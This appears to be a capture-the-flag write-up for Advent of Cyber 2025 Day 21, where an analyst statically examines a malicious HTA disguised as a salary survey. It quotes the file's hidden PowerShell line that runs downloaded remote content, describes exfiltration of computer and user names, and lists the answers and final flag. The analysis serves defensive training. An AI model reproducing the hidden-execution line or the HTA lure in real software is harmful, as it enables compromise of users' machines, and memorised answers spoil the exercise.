Advent of Cyber 2025 – Day 21: Malware Analysis of Malhare.exe (HTA Attack)

Advent of Cyber 2025 – Day 21: Malware Analysis of Malhare.exe (HTA-Based Social Engineering Attack)

Day 21 of Advent of Cyber 2025 deliberately shifts gears away from web exploitation, race conditions, and HTTP quirks, and places you into a scenario that security analysts encounter constantly in real environments:

You receive a suspicious file. You are warned not to execute it. Your task is to determine exactly what it does.

In this challenge, the suspicious artifact is an HTA (HTML Application) delivered to TBFC elves under the disguise of a developer salary survey. Several users opened the file, anomalous behavior followed, and the case was escalated to the SOC.

Your mission is clear:

• Open the file safely
• Reverse its logic
• Identify how King Malhare abused it to compromise systems

Understanding HTA Files: Why They Are a Malware Favorite

Before diving into analysis, it’s important to understand what an HTA file really is.

HTA stands for HTML Application. Technically, it is:

• HTML combined with CSS and scripting (VBScript / JavaScript)
• Executed locally using mshta.exe
• Capable of interacting with Windows COM objects and system utilities

Legitimate uses include:

• Internal IT tooling
• Simple graphical interfaces for scripts
• Automation helpers

However, attackers love HTAs for the same reasons administrators do:

• They allow full script execution
• They often bypass browser security controls
• They look harmless to end users

To most users, an HTA still appears to be “just an HTML file.”

Step 1: Opening the HTA Safely (Static Analysis)

The malicious file is located at:

/root/Rooms/AoC2025/Day21/survey.hta

The most critical rule applies here:

Never double-click an unknown HTA file.

Executing it would immediately trigger malicious logic. Instead, we open it in a text editor:

pluma /root/Rooms/AoC2025/Day21/survey.hta

This allows us to inspect the source code safely without executing any payload.

Step 2: Metadata and Social Engineering Analysis

The first red flag appears in the <head> section of the HTA.

The application title is set to:

Best Festival Company Developer Survey

This is a textbook social-engineering technique:

• Developer-focused theme
• Salary survey (emotionally engaging topic)
• Corporate-sounding phrasing
• No urgency, no threats

This is exactly the kind of wording that makes users think:

“Looks internal. Probably HR or Engineering.”

Step 3: Script Logic and Execution Flow

Scrolling further reveals a large VBScript block:

<script type="text/vbscript">

Within this block, several functions stand out:

• window_onLoad
• getQuestions
• provideFeedback
• decodeBase64
• RSBinaryToString

window_onLoad (Auto-Execution Hook)

HTAs can hook into window events. The function window_onLoad executes automatically when the HTA opens.

In this file, window_onLoad immediately calls:

getQuestions()

This means malicious behavior starts as soon as the file is opened, without any user interaction.

Answer: Q: Which function runs automatically on file execution?

A: window_onLoad

Step 4: getQuestions – Fake Survey Downloader

The function getQuestions pretends to download survey questions. Functionally, it behaves as a downloader.

This function:

• Creates COM objects such as InternetExplorer.Application
• Makes outbound HTTP requests
• Receives encoded content
• Passes data to other functions for processing

Answer: Q: Which VBScript function acts like it is downloading survey questions?

A: getQuestions

Step 5: Network Indicators and Typosquatting

Inside getQuestions, the HTA fetches content from the domain:

survey.bestfestiivalcompany.com

At first glance, this looks legitimate. On closer inspection, there is a critical giveaway.

The legitimate spelling would be:

bestfestivalcompany.com

Instead, we see:

bestfestiivalcompany.com

An extra “i” — a classic typosquatting technique.

Answers:

• Q: What domain are the survey questions downloaded from?

A: survey.bestfestiivalcompany.com

A: The extra i

Step 6: Legitimate Survey Content as Cover

The downloaded content actually includes a real survey.

Reviewing the decoded data reveals:

• 4 survey questions total
• A fake incentive offering a trip to the South Pole

This tactic reduces suspicion by making the HTA appear legitimate.

Answers:

• Q: How many questions does the survey contain?

A: 4

A: A trip to the South Pole

Step 7: Data Exfiltration via provideFeedback

The function provideFeedback(feedbackString) reveals the true malicious intent.

This function:

• Gathers system information using WScript.Network

• ComputerName
• UserName

Exfiltration details:

• Endpoint path: /details
• HTTP method: GET

Answers:

Q: What data is being exfiltrated?

A: ComputerName, UserName

Q: What endpoint receives the exfiltrated data?

A: /details

Q: What HTTP method is used?

A: GET

Step 8: PowerShell Execution of Downloaded Payload

The most dangerous behavior is the execution of downloaded content.

The critical line of code is:

runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False

Breakdown:

• runObject → WScript.Shell
• powershell.exe launches PowerShell
• -nop disables profile loading
• -w hidden hides the window
• -c executes commands
• feedbackString contains remote content

Answer:

• Q: What line of code executes the downloaded payload? A: runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False

Step 9: Second-Stage Payload Obfuscation

The second-stage payload is heavily obfuscated.

Analysis reveals:

1. Base64 encoding
2. ROT13 transformation

After decoding both layers, the payload becomes readable and reveals the final flag.

Answers:

• Q: What encoding is used first? A: Base64
• Q: What encoding is applied next? A: ROT13

Final Flag

After decoding the payload:

THM{Malware.Analysed}

Final Thoughts

This challenge is a perfect representation of real-world malware analysis:

• No detonation
• No shortcuts
• No assumptions

Everything is discovered by reading, reasoning, and understanding attacker tradecraft.

If you can confidently walk through this analysis, you are already thinking like a SOC analyst — and that’s the real win.

Complete Answer Recap (For Reference)

• HTA Title: Best Festival Company Developer Survey
• Downloader Function: getQuestions
• Malicious Domain: survey.bestfestiivalcompany.com
• Typosquatting Indicator: Extra i
• Survey Questions: 4
• Prize Location: South Pole
• Exfiltrated Data: ComputerName, UserName
• Exfil Endpoint: /details
• HTTP Method: GET
• Execution Line: runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False
• Encoding Layers: Base64 → ROT13
• Final Flag: THM{Malware.Analysed}**